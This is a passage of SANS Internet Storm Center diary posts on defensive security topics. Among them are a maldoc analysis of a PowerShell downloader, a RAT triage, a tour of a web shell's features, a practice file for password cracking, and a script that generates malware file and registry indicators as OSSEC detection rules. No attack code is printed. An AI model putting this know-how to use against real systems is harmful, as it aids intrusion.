Published: 2016-07-23

It Is Our Policy

How many times have you heard someone say out loud "our security policy requires..."? Many times we hear, and are sometimes even threatened with, "the security policy". A security policy should set behavioral expectations and be the basis for every technical, administrative and physical control that is implemented. Unfortunately, solid security policies are often elusive for several key reasons.
 
I regularly get the question, "How many security policies should I have?" My response is often found by raising my hands and wiggling my fingers in the air. There is nothing magic about the number of security policies; my observation is that many times there are more security policies than are actually needed.
 
One of the most important aspects of a security policy, just like the jar of mayonnaise in your refrigerator, is an Expiration Date. This non-technical control can help facilitate regular updates to account for current issues being faced and capabilities that may not have existed when the security policy was originally created. Think of this as a built-in process to ensure that it is regularly reviewed - consider a recurring calendar reminder.
 
Should your employees be expected to memorize all of your security policies, and is that even realistic? I hope not, for their sake. What if you redefine the win as each of your employees knowing where to find the policy when faced with a decision? A Central Location for security policies, versus having them spread all over your company, is best and can serve as a set of guardrails to protect both the employee and the company. It will be a key resource for everyone to consult when regularly faced with the question "is this allowed or not in the security policy?" 
 
Finally, as you start to develop or even assess the quality of your security policy, there are several Key Stakeholders, often outside of the information security team, who can provide valuable feedback specific to their respective areas.
  • Human Resources - Because many times employee behavior is involved in an incident
  • Legal - Because many times employee behavior is involved in an incident
  • Privacy - Because sometimes personally identifiable information is involved in an incident
  • Information Security - Because threats against company systems and data are involved in an incident
  • Physical Security - Because sometimes an employee needs to be encouraged to leave as a part of an incident
 
Take a look at the SANS policy website and look for any topics that may be missing in your organization.
 
All that said, what two things can you do next week to improve your security policies? Let us know in the comments area!
 
Russell Eubanks

 

3 Comments

Published: 2016-07-22

The life of an IT Manager

It is true, I am back after a 2 year hiatus from my duties as a Handler at the Internet Storm Center.  Some may be wondering why.  So here it is.

It all started with my new job. I was hired by a company 2 years ago to help move their IT Department forward.  The owner told me it would be a challenge, and I accepted.  They have 6 remote locations plus the corporate office, and I would be the 2nd employee in the IT department taking care of all of the locations. That is where the story begins, and a challenge it was.  My first week on the job I learned that they did not have successful backup jobs running for the 22 Windows servers.  Several of the servers were standalone devices that ranged in age from 4 to 14 years old. They were a mess, and the group policies, DNS, DHCP and Active Directory were a disaster. There were no backups in place for their critical desktop computers and no anti-virus solution company wide. They had no firewalls, no IPS, no spam filter; Windows updates were hit and miss depending on whether the employee took the time to install them.  There were a number of issues with the MPLS between the branches and a hodgepodge of phone systems.  They had no security in place and no Disaster Recovery Plans. Our mail server was blocklisted twice in the first 3 months of my employment, so I had some work to do there as well.  They are self-insured and so had HIPAA requirements to deal with, which weren't being met.  So as you can see, it was definitely a challenge.

As of today we have made great progress.  We have replaced the old servers with new servers but instead of individual boxes we have migrated to virtual machines. We now have 6 physical boxes that are hosting all of the servers. All of the servers are being backed up to a recovery server that is on site as well as to a recovery server that is at one of our remote locations. All of our workstations are being backed up using a 3rd party off-site backup program. We have installed firewalls/IPS, a spam filter, cleaned up our AD (still a lot of work to do), installed Microsoft WSUS, a managed anti-virus/anti-malware solution, moved all phone systems at all locations to the same platform and have begun standardizing hardware and software throughout the organization. Our mailserver has not been blocklisted since I completed the changes to our mail records for compliance and our network lockdown was completed. We are rolling out perimeter security with a digital camera system inside and outside of the facilities at each location and we are in the process of reviewing going from copper to fiber for our MPLS network.

I have completed the initial HIPAA compliance requirements and have started working on the Disaster Recovery. I have monitoring and reporting setup for all aspects of the network infrastructure to attempt to ensure that our network remains safe and secure. Great progress has been made but we have a lot of work yet to do.  I am now the IT Manager and Security and Compliance Officer for the organization. We had a ransomware attempt a few months ago and thankfully it was unsuccessful because of the precautions and preventative measures that have been implemented.

I am sure that I am not the only IT person that has walked into this type of situation and I am sure I won’t be the last.  IT is so fluid and continuously changing and the threats to the environment have changed too.  One of my IT friends said it is like shooting fish in a barrel and I have to agree.

Deb Hale

3 Comments

Published: 2016-07-21

Practice ntds.dit File

I know many people that like password cracking. Or that would like to try it out.

That's why I published an Active Directory database file to practise hash extraction and password cracking. You can find it here.

If you know other resources to practise hash extraction and password cracking, please post a comment.

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

1 Comments

Published: 2016-07-20

Guest Diary, Etay Nir: Flipping the Economy of a Hacker

Flipping the economy of a Hacker

 

Palo Alto Networks partnered with the Ponemon Institute to answer a very specific question: what is the economic incentive for adversaries?

Ponemon was chosen as they have a history of crafting well-respected cybersecurity research, including their well-known annual "cost of a data breach" reports. The findings are based on surveys and interviews with cybersecurity experts, including current or former attackers. These are all individuals who live and breathe security, many of whom have conducted attacks. Nearly 400 individuals took part in the research, across the United States, Germany and the United Kingdom.

When you think about security research, most of the focus has been on how attackers get in, and the damage they cause once they are inside. We set out to approach this problem from a completely different angle: understand the economic motivations of an attack and the factors that influence them, and leverage this data to help organizations better respond to attacks. If we can remove the motivation, we can decrease the number of successful attacks. It is as simple as that.

You can download the full report from: http://media.paloaltonetworks.com/lp/ponemon/report.html and

http://www.ponemon.org/library/flipping-the-economics-of-attacks

There are clear highlights I believe that can influence your understanding of attackers, and influence your ability to defend yourself from them:

  • The majority of attackers (72 percent) were opportunistic, not wasting time on efforts that do not quickly yield high-value information. While advanced nation-state actors employ lots of planning, think of the average attacker as the mugger on the street, versus the "Ocean's Eleven" crew that spends weeks planning a complicated high-stakes heist. When put into this context, organizations that prioritize making themselves a harder target will actively deter a significant number of potential breaches.
  • There is a common notion that they are in for a big payday. This is really the exception, rather than the rule, with average annual earnings from malicious activity totaling less than $30,000, which is a quarter of a cybersecurity professional’s average yearly wage. This limited earning power becomes even less attractive when you consider the added legal risks including fines and jail time.
  • Time is the defining factor to change the adversary's arithmetic. As network defenders, the more we delay adversaries, the more resources they will waste, and the higher their cost will be. We found that increasing the time it takes to break in and carry out a successful attack by less than 2 days (40 hours) will deter the vast majority of attacks.
  • Finally, it is all about how you protect yourself. Because attackers are so opportunistic, and their time is so valuable, we can change the attack equation with next-generation security approaches. We found that organizations rated as having “excellent” security took twice as long to breach, when compared to those rated as “typical.” Putting the right security in place makes all the difference.

 

To understand how to influence an attacker's economic motivation, we must consider what I call the "adversary arithmetic," which boils down to the cost of an attack versus the potential payoff of a successful data breach. If malicious actors are putting in more resources than they are getting out, or we decrease their profit, being an attacker becomes much less attractive. What we have seen is simple: more malware and exploits, more effective toolkits, and cheaper computing power have lowered the "barrier to entry" for an attack, and resulted in the increase in attacks covered above.

Using the survey finding as a guideline, let’s walk through what we can do to reverse this trend.

It is a random mugging, not a robbery. The data suggests that the majority of adversaries are motivated by quick and easy financial gain. As opposed to a "movie script heist", attackers are looking for opportunistic street "muggings" that take advantage of easy targets: about 69% of them are motivated by profit, and 72% of the attacks are opportunistic.

  • The primary motivation of attackers is profit! This will guide every other finding in this report, and how we shape our responses. It is important to note that there is a spectrum of malicious actors, and organizations must always maintain awareness of potentially dangerous, highly targeted attacks, or nation-state led activity such as cyber espionage or cyber warfare. However, if we can disincentivize anywhere near that number of attackers, we will be making a huge dent in the threat landscape.
  • The majority of attackers are opportunistic, meaning they are looking for the quick and easy job. When put into this context, organizations that prioritize making themselves a harder target will actively deter a significant number of potential breaches.

Ponemon suggests that the financial motivation for profit is being supported by a decline in the cost of conducting an attack: 56% of respondents believed that the time and resources required to conduct successful attacks have gone down. This is the proof behind the cost curve, and why it is more important than ever to focus on increasing the cost. We cannot allow adversaries to maintain this "edge"; if we do, they will continue to erode our trust in the Internet. Let's look at the reasons behind this cost decrease.

It is not enough to know that costs are decreasing; we must examine why this is occurring in order to combat each reason. From the survey results, we see a few key facts bubble to the surface:

  • There are more available malware and exploits, as we discussed in the “adversary arithmetic,” being the largest factor at 64%.
  • Next, we see an interesting trend, with 47% citing increased attacker skills. It is not all about the availability of threats, but the sharing of best practices and learning.
  • 47% claim better attack toolkits are responsible, and we'll see below why these are so powerful.
  • The final two are very much part of the same trend as improved skills. There is more intelligence on targets, making the recon stage of an attack easier and the threats more tailored, but we also saw collaboration among attackers being a major factor. What this adds up to is the big impact the criminal underground has. It is not just independent attacker groups, but online forums, just like we have for our organizations. Except on these, malware is traded and sold, techniques are shared and perfected, and attackers can learn from each other.

Toolkits automate the entire process, and have become increasingly sophisticated. They can be crafted to do essentially anything, usable by anyone, without much technical skill. Dark Comet and Poison Ivy are two well-known examples, which have been used in some very high-profile attacks, including against Syrian activists and government organizations. They aren't just for the "easy targets."

 

Now that we understand how powerful these toolkits can be, let’s dive into the report findings on how they have evolved.

The data here proves our hypothesis: toolkits are highly effective, and they make being an attacker much easier. Nearly 70% cited that using a toolkit makes it easier to be an attacker, with 64% saying toolkits are highly effective. Given this, what is concerning is the scale at which they have been increasing in popularity, with the study finding that 63% cited increased usage.  Lastly, and most importantly, is their relatively low cost. With only $1,387 spent by attackers on average, we can see how toolkits act as force multipliers in the threat landscape. It is also important to note that attackers ARE buying these. They are serious applications with developers, support, and an entire ecosystem out there. There are even attackers offering usage-based models for their software: rent a botnet, ransomware as a service. Consider how this compares with the enterprise software you use and purchase.

The survey found that the average attacker is making less than $30,000 on an annual basis! It literally doesn't pay to be the bad guy, as this is about one quarter of the annual salary of a cybersecurity professional. There have been many cases of former attackers turning around and applying the skills they learned to help the security community. Not only this, but we have such a need for talented security operators that leveraging this group to help defend the network, rather than attack it, is good business for everyone. Think about pentesters who really know how to break into networks, or application security developers who know how to find vulnerabilities.

You also must consider the legal risk of being an attacker, which can include large fines and jail time. The question we must ask is how can we convert attackers into good guys? Paying them well is a good start.

Now we come to the most important finding in the report: how can we deter attacks? Some of the findings may surprise you. Delaying an attacker by less than 2 days (40 hours) will deter 60% of attacks. Think about an average week, and how much of an impact this simple addition can have. Attackers will give up and move on to the next opportunistic target after a relatively short time period. Every single security control, policy, and training you deploy adds to how long it takes them to break in, and it all matters.

It was surprising just how much time is the defining factor in changing the adversary's arithmetic. As network defenders, the more we delay adversaries, the more resources they will waste, and the higher their cost will be. We can interrupt the march toward ever-cheaper attacks by taking a slightly different perspective on the problem.

Another finding is that companies rated as "typical" took less than 3 total days (70 hours) to breach. This is HALF the time it takes for a well-protected organization, at 140 hours. Combine this finding with the 70% who will walk away when presented with a strong defense, and the 40 hours of added delay that will deter 60% of attacks, and the adversary equation can begin to flip in the "good guys'" favor.
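The arithmetic can be sketched in a few lines. Only the $1,387 average toolkit spend and the 70/140-hour breach times come from the report; the hourly opportunity cost is an assumption of mine, derived from the sub-$30,000 annual earnings figure.

```python
TOOLKIT_COST = 1387.0           # average attacker toolkit spend (from the report)
HOURLY_RATE = 30000.0 / 2000.0  # assumed: <$30k/year over ~2,000 working hours

def attack_cost(hours_to_breach):
    """Rough cost of one attack: attacker time plus tooling."""
    return hours_to_breach * HOURLY_RATE + TOOLKIT_COST

typical = attack_cost(70)     # "typical" defenses (70 hours to breach)
excellent = attack_cost(140)  # "excellent" defenses take twice as long
```

Doubling the time to breach raises the attacker's sunk cost before any payout, which is the report's central point about delay as a deterrent.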

So now what?

Based on the research, we know that attacks are increasing due to their decreasing cost, which has a number of contributing factors. We also know that attackers are motivated by profit. With that mindset, we need to approach this challenge through the lens of increasing the cost of attacks and decreasing their profit motivation. We have split this into three categories:

  • Remove the profit motivation by forcing adversaries to build custom, expensive attacks each time. It is extremely costly to build new malware, identify new exploits, and constantly change your tactics for every attack.
  • Automatically identify and prevent new threats. When new attacks are developed, or current ones evolve, we need to quickly turn them into known threats and block them in real time. This means all the time and money that was spent to craft something novel is instantly outdated. This needs to be done at both the network and the endpoint level.
  • Finally, you need visibility into your network, whether it is in the cloud, data center, mobile devices, or anywhere in-between. This visibility will allow you to classify the threats and malicious actors attempting to breach your organization, and feed that information into proactive steps to reduce your risk posture.

6 Comments

Published: 2016-07-19

ASN.1 Anyone? CVE-2016-5080

*Cue Back to the Future music* More than a decade ago there was a major discovery in ASN.1 that contributed to arguably one of the worst vulnerabilities in a long time. Fast forward *cue awful fast-forward tape music* to 2016, and ASN.1 is here again. Please reference this link https://github.com/programa-stic/security-advisories/tree/master/ObjSys/CVE-2016-5080 for the major details as this unfolds regarding CVE-2016-5080.

According to the CERT page [3], the winners of the ASN.1 award so far seem to be Objective Systems and Qualcomm Incorporated, both reporting impact from CVE-2016-5080. Honeywell and Hewlett Packard Enterprise are reporting "Not Affected". Many other vendors are in an unknown state.

Wait Richard, what the h^&& is ASN.1? [4] ASN.1 is a standard that is jointly maintained and governed by the International Organization for Standardization (ISO), the International Electrotechnical Commission (IEC), and the International Telecommunication Union (ITU-T). It is a syntax notation that defines rules for encoding, transmitting, and decoding data [4]. Basically, it does A LOT of stuff and it is EVERYWHERE *a slightly panicked tone*.
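To make the notation concrete, here is a hedged, hand-rolled Python sketch of DER, one of ASN.1's wire encodings, where every value is a tag-length-value triple. Real code should use a vetted ASN.1 library; ad-hoc encoders and parsers like this one are exactly where CVE-2016-5080-class bugs live.

```python
def der_integer(n):
    """Encode a non-negative int as a DER INTEGER (tag 0x02).

    The length calculation pads with a leading zero byte when the
    high bit is set, as DER requires for non-negative values.
    """
    body = n.to_bytes((n.bit_length() + 8) // 8 or 1, "big")
    return bytes([0x02, len(body)]) + body

def der_sequence(*items):
    """Wrap encoded items in a SEQUENCE (tag 0x30).

    Sketch only: short-form lengths (< 128 bytes) are supported.
    """
    body = b"".join(items)
    assert len(body) < 128, "long-form lengths not implemented in this sketch"
    return bytes([0x30, len(body)]) + body
```

For example, `der_sequence(der_integer(1), der_integer(2))` yields the classic nested TLV layout that ASN.1 decoders must parse, and mis-parse, at every layer.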

Please review this CVE (CVE-2016-5080) and monitor it closely. We at the storm center will monitor this and update it as it unfolds.

[1] https://www.sans.org/reading-room/whitepapers/protocols/snmp-potential-asn1-vulnerabilities-912

[2] https://github.com/programa-stic/security-advisories/tree/master/ObjSys/CVE-2016-5080

[3] http://www.kb.cert.org/vuls/id/790839

[4] https://en.wikipedia.org/wiki/Abstract_Syntax_Notation_One

0 Comments

Published: 2016-07-19

Office Maldoc: Let's Focus on the VBA Macros Later...

I received another malicious Office document.

oledump.py shows it contains VBA macros, but also a userform (A4 - A7).

Before we look at the VBA macros, we'll take a look at the values in the userform (A7 .../o).

It looks like it contains BASE64 text. Let's use a plugin to take a look at the values:

When we use option -q, we see just the output from the plugin:

That output can be piped into base64dump.py to see if we detect BASE64 text:

Not all text is recognized as valid BASE64. Let's see if concatenating all the text produces a different result. We do this with option -w to ignore all whitespace:

It's clear now that this is valid BASE64, and that the decoded text starts with %COMSPEC% ...
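The concatenation trick can be reproduced in a few lines. The fragments below are made-up stand-ins for the userform strings, not the actual sample's values: "JUN" alone is not valid BASE64 (its length is not a multiple of 4), but once the pieces are joined, the whole string decodes cleanly.

```python
import base64

# Hypothetical fragments standing in for the userform strings.
chunks = ["JUN", "PTVNQ", "RUMl"]

# Strip whitespace and concatenate, as base64dump.py's -w option does.
joined = "".join(c.strip() for c in chunks)
decoded = base64.b64decode(joined)
print(decoded)  # b'%COMSPEC%'
```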

So let's do an ASCII dump of that BASE64 text:

Now it's clear that this is a downloader using PowerShell. We can also dump the code:

When we analyze the VBA macros, we will find code that references the userform to concatenate the BASE64 text. It then decodes it and executes it.

But this time, just by poking a bit at the BASE64 text, we were able to recover the malicious payload.

 

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

6 Comments

Published: 2016-07-18

HTTP Proxy Header Vulnerability ("httpoxy")

"HTTPoxy" refers to an older vulnerability in how web applications use the HTTP  "Proxy" header incorrectly. The vulnerability was first described in 2001 in libwww-perl, but has survived detection in other languages and plugins until now. The vulnerability can be found in some popular implementations, but is not affecting the vast majority of web applications.

According to RFC 3875, which describes CGI ("Common Gateway Interface"), the content of the "Proxy" header is assigned to the HTTP_PROXY environment variable. Like all user-supplied data, this value needs to be validated, but sadly, some web applications fail to do so.

The effect is that outbound web requests from the application may use a proxy provided by the user.

You are vulnerable if you are not validating the Proxy header, AND if you are using specific frameworks for outbound web requests that use the HTTP_PROXY environment variable.

For a full list of affected applications, and more details, see https://httpoxy.org . The site also suggests specific mitigation techniques, like removing the Proxy header from all inbound requests, which is probably a sound technique to minimize the impact of this issue.
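For a Python application, that header-stripping mitigation can be sketched as a WSGI middleware that drops the CGI mapping of the Proxy header before the application sees it. Function and variable names here are illustrative, not taken from the advisory.

```python
# Hedged sketch of the httpoxy mitigation for WSGI applications.
def strip_httpoxy(app):
    def wrapper(environ, start_response):
        # CGI maps an inbound "Proxy: ..." request header to HTTP_PROXY,
        # so an outbound HTTP library reading that variable would proxy
        # through an attacker-controlled host. Remove it unconditionally.
        environ.pop("HTTP_PROXY", None)
        return app(environ, start_response)
    return wrapper
```

Doing this at the web server or load balancer (rejecting or deleting the Proxy header on all inbound requests) protects every application behind it, which is why the advisory's suggestion is a sound default.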

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

2 Comments

Published: 2016-07-16

Python Malware - Part 3

I have been using my YARA rule PE_File_pyinstaller to scan for Python malware for some time now, and have come across some interesting samples (after discarding false positives; PyInstaller is of course also used for benign software).
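I don't reproduce the rule here, but the idea behind such a check can be sketched in Python. The marker strings below are my own assumptions based on well-known PyInstaller byproducts, not the contents of PE_File_pyinstaller.

```python
# Flag PE files that embed PyInstaller marker strings. Illustrative
# only: the marker list is an assumption, not the actual YARA rule.
MARKERS = (b"pyi-windows-manifest-filename", b"MEIPASS2", b"PyInstaller")

def looks_like_pyinstaller(data):
    """True for MZ (PE) files containing any assumed PyInstaller marker."""
    return data[:2] == b"MZ" and any(m in data for m in MARKERS)
```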

This is a sample I found (MD5 B79713939E97C80E204DE1EDC154A9EB).

I use pyinstxtractor.py to extract the Python code from the EXE created by PyInstaller.

This creates a folder (sample filename + _extracted):

The file "implant" contains the malicious Python code:

This turns out to be a Remote Access Tool (RAT) that uses Gmail as C&C.

It can execute shellcode, upload and download files, make screenshots, execute commands, lock the screen and log keystrokes:

Armed with this information and with the help of Google, I found the code for this sample on GitHub.

If you come across a malicious PE file created with PyInstaller, don't reach for a disassembler like IDA Pro; extract the Python code instead.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

1 Comments

Published: 2016-07-15

Name All the Things!

With our increasingly complex environments and processes, we handle a huge amount of information on a daily basis. To improve communication with our colleagues and peers, it is mandatory to speak the same language and to avoid ambiguities when talking to them. A best practice is to apply a naming convention to everything that can be labeled. This applies to multiple domains, not only information security. Examples:

  • Computers (hosts)
  • People (logins, email addresses, profiles)
  • Programs & source code (functions, classes and variables names)
  • Files & directories
  • Databases (index, fields, ...)
  • ...

A good naming convention is one that is approved by all parties and helps you perform your job better. While everybody is free to define a new one (when I worked for a company in Belgium, the servers were named after Belgian beers), there are some rules to follow. The Belgian beer example is a good one: even if we have many beers, a big organization with plenty of servers will be limited in its choice of names. Some names will be very simple, others too complex. Here are some rules to follow if you need to implement a naming convention:

  • Choose easily readable identifier names
  • Favor readability over brevity
  • Do not use non-alphanumeric characters (stick to '[a-z][0-9][-_]')
  • Avoid using identifiers that conflict with keywords or widely used terms
  • Keep it in "English"

Some rules are more specific to certain types of data. For example, for files and directories, use timestamps like 'YYYYMMDDHHMMSS' at the beginning of file names to get automatic ordering. Prepending names with the project number or the customer's ID can help you quickly find details about a customer.
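The two conventions above can be sketched in Python. The character set and timestamp format mirror the rules stated earlier; they are this document's choices, not a universal standard.

```python
import re
from datetime import datetime

# The '[a-z][0-9][-_]' character check from the rules above.
NAME_RE = re.compile(r"^[a-z0-9][a-z0-9_-]*$")

def valid_name(name):
    """True when the name sticks to lowercase alphanumerics, '-' and '_'."""
    return bool(NAME_RE.match(name))

def stamped(name, when):
    """Prefix a file name with YYYYMMDDHHMMSS for automatic ordering."""
    return when.strftime("%Y%m%d%H%M%S") + "_" + name
```

Running such a check in a pre-commit hook or provisioning script is one way to make the convention enforceable rather than aspirational.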

In the security landscape, we can apply naming conventions to many "objects" or "assets". In the configuration of security tools, objects must respect a naming convention. Examples:

  • Objects in a firewall configuration
  • Rules in an IDS server
  • Groups and IOCs' in a threat intelligence solution
  • In Forensics investigation (files, evidences)

This sounds easy to implement, but that's not always the case. There are also bad examples, like the anti-virus vendors who often use their own names to identify a piece of malicious code. Have a look at a sample report on VT to get an idea of the disaster:

This isn't a recent issue, it was already discussed in 1991(!): http://www.caro.org/articles/naming.html.

And you? Do you have good rules to share to build a naming convention? What did you normalize? Feel free to share.

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

3 Comments

Published: 2016-07-13

The Power of Web Shells

[Warning: this diary contains many pictures and may take some time to load on slow links]

Web shells are not new in the threat landscape. A web shell is a script (written in PHP, ASP, Perl, ... depending on the available environment) that can be uploaded to a web server to enable remote administration. While web shells may be installed for legitimate purposes, many are installed on compromised servers. Once in place, the web shell allows a complete takeover of the victim's server, but it can also be used to pivot and attack internal systems.

In a recent investigation, I found a compromised website on a shared platform that was delivering phishing pages. I was able to get access to the archive containing the phishing kit, but also to a web shell that was installed on the server in an easy-to-guess location. The web shell presents itself as "RC-SHELL" and is not brand new (I found references to it from 2013), but it has a very low detection rate on VT (4/55) and had been uploaded for the first time only a few hours before my submission. Maybe it has been improved or updated?

Modern web shells are very powerful and offer plenty of features to the attacker. Because some pictures are worth a thousand words, I decided to take a tour of the interface to give you more details about modern web shells and to show their power. This web shell is written in PHP and, as usual, access to the web interface is restricted via hardcoded credentials. The login/password hashes are in the source code. A quick search in rainbow tables returned "test" for both the login and the password! This time, it was even easier: access was open (the authentication was disabled in the code). Note that the source code also contained the e-mail address of the owner.

When you access the URL, here is the default screen:

On top of the screen, you can see details about the host and basic PHP settings like the "safe-mode" status, available databases support. Then, the single-line menu to access all the features. Let's review them.

The menu "Files" gives access to a file manager that can be used to browse the local file system (with the web user UID restrictions) and perform actions on files (copy, delete, rename, move, etc):

The menu "Search" performs file search operations (think about the "find" Linux command) but you can also search for specific contain inside files (like "grep"):

The "Upload" menu transfers files on the local file system. Files can be uploaded from the local drive (on the attacker's computer) or fetched from a remote location (using common protocols like HTTP, FTP):

The "Cmd" menu executes shell commands on the target (this is really the core feature of a web shell). Commands are executed (with the web server UID rights) and output is returned in the browser: 

The "Eval" menu offers the same features as "Cmd" but executes native PHP code. This is a "PHP Shell":

The "FTP" menu gives access to a powerful FTP client like WinSCP or any other graphical tool:

The "SQL" menu provides tools like PHPMysqlAdmin. It allows to interact with SQL servers:

The "Mailers" menu, as the name suggests, is a tool to send spam. Simple emails can be send but also campaigns based on a CSV file:

The "Calc" menu is a toolbox which provides tools like hash calculators, encoders, converters:

The "Tools" menu is my preferred one. It offers many tools to pivot internally and attack other resources: brute-force, code injection, shell binder, port-scanner, etc:

Finally, the two last menus are used to manage processes on the box (à la "top") and to display system information about the host (CPU, memory, file systems, ...):

As you can see, a modern web shell is a powerful tool. Keep in mind that a web shell is executed with the rights and permissions of the web server (e.g. "www-data" on a Linux system). To reduce the risks, apply best practices like:

  • Run the web server in a restricted environment (a VM, a Docker container, a chroot() jail).
  • Do NOT allow privileged access via commands like sudo.
  • Do NOT give full DBA access to your database, restrict access to required database/tables and allow required SQL commands only.
  • Implement egress filters and restrict communications with the outside world.
  • Protect your web server directories against write operations.

Do not hesitate to share your stories about web shells. Did you find one, how, where?

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

8 Comments

Published: 2016-07-13

Drupal: Patch released today to fix a highly critical RCE in contributed modules

Drupal announced that they will release today (Wed July 13th 2016 16:00 UTC) a patch that will fix highly critical remote code execution vulnerabilities in contributed modules. Drupal core is not affected.

The vulnerability is a "PHP Arbitrary Code Execution" and is rated up to 22/25 (based on the risk calculation model used by Drupal - details here). The vulnerable modules are used on between 1,000 and 10,000 instances.

If you maintain one or more Drupal websites, review the list of affected contributed modules and apply the patch as soon as possible if you're affected.

Link to the advisory ID: DRUPAL-PSA-2016-001

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments

Published: 2016-07-12

Hunting for Malicious Files with MISP + OSSEC

A few months ago, I wrote a diary called “Unity Makes Strength” which was illustrated with an example of integration between a malware analysis solution and a next-generation firewall. The goal is to increase the ability to block malicious traffic as soon as possible. Today, I’d like to explain how to improve the detection of malware on Windows computers thanks to the integration of MISP and OSSEC. I already presented the Malware Information Sharing Platform in another diary. About OSSEC, in a few words, it is a host-based IDS with many extra features like log centralisation, real-time alerting, file integrity monitoring and much more. 

To achieve detection of malicious files or registry keys on Windows hosts, let's use a very interesting feature of OSSEC called "rootcheck" that performs rootkit detection. OSSEC comes with a default configuration that contains interesting examples but, with the malware landscape changing daily, this configuration quickly becomes obsolete. The goal is to search a MISP database for recent IOCs and inject them into the OSSEC configuration. Both solutions are really open, and integration is quite easy. 

A MISP instance can be fully managed via the available REST API. To simplify the use of this API, there is even a Python library called PyMISP. Here is a very simple example that gets the latest events from MISP:

import json

from pymisp import PyMISP
from keys import misp_url, misp_key, misp_verifycert

misp = PyMISP(misp_url, misp_key, misp_verifycert)
result = misp.download_last("1d")
for event in result:
    print(json.dumps(event) + "\n")

The data flow will be:

MISP > PyMISP.py (via the REST API) > IOC-list > OSSEC > OSSEC agents

I wrote a small script called "MOF", which stands for "MISP OSSEC Feeder". It extracts the interesting file names from MISP. The following types of attributes are extracted:

  • Artefacts dropped
  • Payload delivery
  • Payload installation

To reduce the risk of false positives, only filenames containing Windows environment variables are exported (%TEMP%, %WINDIR%, %APPDATA%, ...). Registry keys are also exported. The script usage:

# ./mof.py -h
usage: misp_ossec_export.py [-h] -t TIME [-o OUTPUT]

Extract IOC's from MISP and generate an OSSEC rootcheck file.

optional arguments:
  -h, --help            show this help message and exit
  -t TIME, --time TIME  Time machine (ex: 5d, 12h, 30m).
  -o OUTPUT, --output OUTPUT
                        Output file
# ./mof.py -o /var/ossec/etc/shared/misp_windows_ioc.txt

The script requires the PyMISP library that can be installed easily via a "pip install pymisp".
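For reference, the attribute-selection logic described above (keep filenames that contain a Windows environment variable, plus registry keys) can be sketched in a few lines of Python. This is a simplified illustration with invented attribute values, not the actual MOF code:

```python
import re

# Invented example attributes as (type, value) pairs; MOF reads these from MISP.
attributes = [
    ("filename", "%APPDATA%\\Frfx\\firefox.exe"),
    ("filename", "report.docx"),  # no environment variable: skipped
    ("regkey", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\BluetoothManage"),
]

# Only export filenames anchored to a Windows environment variable
env_var = re.compile(r"%(TEMP|WINDIR|APPDATA|USERPROFILE|PROGRAMFILES)%", re.I)

rootcheck_lines = []
for attr_type, value in attributes:
    if attr_type == "filename" and env_var.search(value):
        rootcheck_lines.append("f:" + value + ";")  # rootcheck file check
    elif attr_type == "regkey":
        rootcheck_lines.append("r:" + value + ";")  # rootcheck registry check

print("\n".join(rootcheck_lines))
```

The "f:" and "r:" prefixes match the rootcheck syntax shown in the generated file below.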

The generated rootcheck configuration file looks like the example below. IOCs are grouped by MISP event.

#
# OSSEC RootCheck IOC generated by MOF (MISP OSSEC Feeder)
# https://github.com/xme/
#
# Generated on: Mon Jul 11 22:06:56 2016
# MISP url: https://misp.home.rootshell.be/
# Wayback time: 30d
#

[MISP_2073] [any] [Packrat: Seven Years of a South American Threat Actor]
r:HKLM\SOFTWARE\Microsoft\Active;
r:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Policies;
r:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msconfig;

[MISP_2200] [any] [Click-Fraud Ramdo Malware Family Continues to Plague Users]
r:HKCU\SOFTWARE\Adobe\Acrobat Reader\14.0\Globals\LastLoggedOnProvider;
r:HKCU\SOFTWARE\Adobe\Acrobat Reader\14.0\Globals\IconUnderline;
r:HKCU\SOFTWARE\Adobe\Acrobat Reader\14.0\Globals\HangDetect;
r:HKCU\SOFTWARE\Adobe\Acrobat Reader\14.0\Globals\LastProgress;
r:HKCU\SOFTWARE\Adobe\Acrobat Reader\14.0\Globals\ShowTabletKeyboard;
r:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BluetoothManage;

[MISP_2210] [any] [Jigsaw Ransomware Decrypted: Will delete your files until you pay the Ransom]
f:%USERPROFILE%\AppData\Roaming\Frfx\;
f:%USERPROFILE%\AppData\Roaming\Frfx\firefox.exe;
f:%USERPROFILE%\AppData\Local\Drpbx\;
f:%USERPROFILE%\AppData\Local\Drpbx\drpbx.exe;
f:%USERPROFILE%\AppData\Roaming\System32Work\;
f:%USERPROFILE%\AppData\Roaming\System32Work\Address.txt;
f:%USERPROFILE%\AppData\Roaming\System32Work\dr;
f:%USERPROFILE%\AppData\Roaming\System32Work\EncryptedFileList.txt;

The next step is to integrate this new file into your OSSEC agent.conf file. Please have a look at the OSSEC documentation for a complete description of the shared agent configuration. Here is mine (stored in '/var/ossec/etc/shared/agent.conf' by default):

<ossec_agent os="Windows">
  <rootcheck>
    <windows_audit>./shared/win_audit_rcl.txt</windows_audit>
    <windows_apps>./shared/win_applications_rcl.txt</windows_apps>
    <windows_malware>./shared/misp_windows_ioc.txt</windows_malware>
  </rootcheck>
</ossec_agent>

To fully automate the process, install the script on your OSSEC server and execute it from a crontab at a regular interval (example: once a day). Note that the agent.conf is not pushed immediately to agents - it may take a while depending on your configuration! The Python script is available here. And you, how do you search for malicious files across multiple hosts/locations?

Happy hunting!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 Comments

Published: 2016-07-12

Microsoft Patch Tuesday Summary for July 2016

As usual for the second Tuesday of the month, Microsoft today released its monthly security updates. Microsoft released a total of 11 bulletins: six are rated critical, and the remaining five are rated important.

One of the Bulletins (MS16-093) affects Adobe's Flash player and is a copy of Adobe's advisory.

None of the bulletins stick out as "special". There are no bulletins that affect vulnerabilities for which exploits have been observed. But two bulletins included already known vulnerabilities:

%%cve:2016-3287%%, a vulnerability in Secure Boot.
